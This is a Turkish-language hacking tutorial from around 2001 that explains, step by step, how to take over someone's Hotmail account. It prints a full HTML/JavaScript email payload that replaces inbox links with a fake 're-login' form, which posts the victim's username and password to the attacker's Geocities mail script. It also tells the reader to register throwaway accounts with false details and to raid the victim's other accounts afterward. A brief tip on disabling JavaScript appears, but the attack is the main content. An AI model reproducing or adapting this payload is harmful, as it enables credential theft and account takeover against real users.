HOTMAİL HACKline.gif (4491 bytes)

Bilindiği gibi Microsoft'un ünlü ücretsiz e-mail sitesi hack edildi. Nasıl mı oluyor?

Kurbana Javascript codu içeren bir e-mail attıyorsunuz.Kurban bu e-mail'i görüntülediği zaman Javascript kodu devreye giriyor ve Kurbana tekrar Login olmasını söylüyor.Tabii böyle olunca size kurbanın kullanıcı adı ve ip adresini içeren bir e-mail geliyor.

Tabii siz kullanıcı adını ve şifresini öğrendiğiniz zaman hesabın tam kullanın hakkını kazanıyorsunuz.silmek, okumak, kurban adına mailler göndermek... Tabii siz boş durmayıp POP Mail'leride kontrol ediyorsunuz ve kurbanın diğer sitelerdeki
hesaplarının şifrelerini alıyorsunuz.



Peki bu olaydan kurtulamayacağız mı ??? .

Netscape kullanıcıları javascript ayarlarını şöyle kapatabilir. (edit / preferences / advanced / disablejavascript).

Microsoft Internet Explorer kullanıcıları jscript ayarlarını şu şekilde kapatabiliir. (view / internet options /security / custom
settings / scripting / disable active scripting).



Tabii En Önemlisi Başkasının Hotmail Hesabını Nasıl Ele Geçiririz ???

Aşağıdaki Listedekiler elimizde olmalı.

1 İnternete bağlı bir bilgisayar... eh yani :-))
1 Netscape Mail (veya herhangi bir e-mail programı)
1 Notepad (veya herhangi bir text editor)

1.ADIM:

hotmail.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabı açtırıyoruz. Formu doldururken gerçek bilgilerimizi vermemize gerek yok. Rastgele birşeyler yazsakta olur.

2.ADIM:

Geocities.com sitesini ziyaret ediyoruz ve ücretsiz bir e-mail hesabı açtırıyoruz. Formu doldururken gerçek bilgilerimizi vermemize gerek yok. Rastgele birşeyler yazsakta olur.1.adimda e-mail adresini kullandık.ve geocities'ten bir e-mail adresi
aldık.örneğin(ybwc@geocities.com).

3.ADIM:

NotePad'imizi açıyoruz ve aşağıdaki text'i yazıyoruz. Daha sonra message.htm ismini verip kayıt ediyoruz. Satır 17'de Geocities kullanıcı adımız yazıyor. (ybwc) 2.adımda belirttiğimiz gibi. (bu kullanıcı adını kendinize göre değiştirin.)


<html><head></head><body>
<p>"Go where you want today" - Blue Adept</p>
<script>
function getmess(){
return "<table border=0 cellpadding=5 cellspacing=5 width=508 height=90%>" +
"<tr valign=middle>" +
"<th colspan=2>" +
"<font face=\"Arial, Helvetica\" size=\"5\">" +
"We're Sorry, We Cannot<br>Process Your Request" +
"</font></th></tr>" +
"<tr valign=middle><td align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">Reason:&nbsp;</font>" +
"<font face=\"Arial, Helvetica\" size=\"3\" color=\"#ff0000\"><b>Time expired. Please
re-login.</b></font><br>" +
"<font face=\"Arial, Helvetica\" size=\"2\"><a
href=\"http://www.hotmail.com/errormsg.html\">(Get more info regarding error messages
here)</a></font>" +
"</td></tr>" +
"<tr valign=\"middle\"><td align=\"center\">" +
"<FORM METHOD=POST ACTION=\"http://www.geocities.com/cgi-bin/homestead/mail.pl?ybwc\"
target=\"_top\">" +
"<INPUT TYPE=\"hidden\" NAME=\"next-url\" VALUE=\"http://www.hotmail.com\">" +
"<INPUT TYPE=\"hidden\" NAME=\"subject\" VALUE=\"Hotmail Password\">" +
"<table cellpadding=\"0\" cellspacing=\"5\" border=\"0\">" +
"<tr><td><font face=\"Arial, Helvetica\" size=\"2\">Login Name:</font><br><input
type=\"text\" name=\"login\" size=\"16\" maxlength=\"16\"></td><td><font face=\"Arial,
Helvetica\" size=\"2\">Password:</font><br><input type=\"password\" name=\"passwd\"
size=\"16\" maxlength=\"16\">&nbsp;<input type=\"submit\" value=\"Enter\"></td><tr>" +
"</table></form></td></tr>" +
"<tr valign=middle><th colspan=2 align=center>" +
"<font face=\"Arial, Helvetica\" size=\"3\">" +
"Return to <a href=\"http://welcome.to/www.hotmail.com\" target=\"_parent\">Hotmail's
Homepage</a>." +
"</font></th></tr></table>" +
"<p><img src=\"http://209.1.112.251/c9698.gif\" width=189 height=16 border=0
alt=\"Copyright 1996-1997\">";
}

nomenulinks=top.submenu.document.links.length;
for(i=0;i<nomenulinks-1;i++){
top.submenu.document.links[i].target="work";
top.submenu.document.links[i].href="javascript:getmess()";
}

noworklinks=top.work.document.links.length;
for(i=0;i<noworklinks-1;i++){
top.work.document.links[i].target="work";
top.work.document.links[i].href="javascript:getmess()";
}

</script>
</body>
</html>

4.ADIM

kurbanızıma yeni bir e-mail mesajı hazırlayıp gönderiyoruz.örneğin: kurban,
(victim@hotmail.com)olsun. E-mailimize message.htm dosyasınıda ekliyoruz ve gönderiyoruz.

5.ADIM

Kurbanımızın e-mailini kontrol etmesini bekliyoruz. Kurban bizim e-maili görüntülediği zaman Geocities'teki mailimizi kontrol ediyoruz. Geocities2ten bir mail alıyoruz. Tabii bu mail'de kurbanımızın kullanıcı adı, şifresi ve ip adresi oluyor...

© 2001  STEALA ONLINEAll right Reserved. MaiL To: admin@steala.cjb.net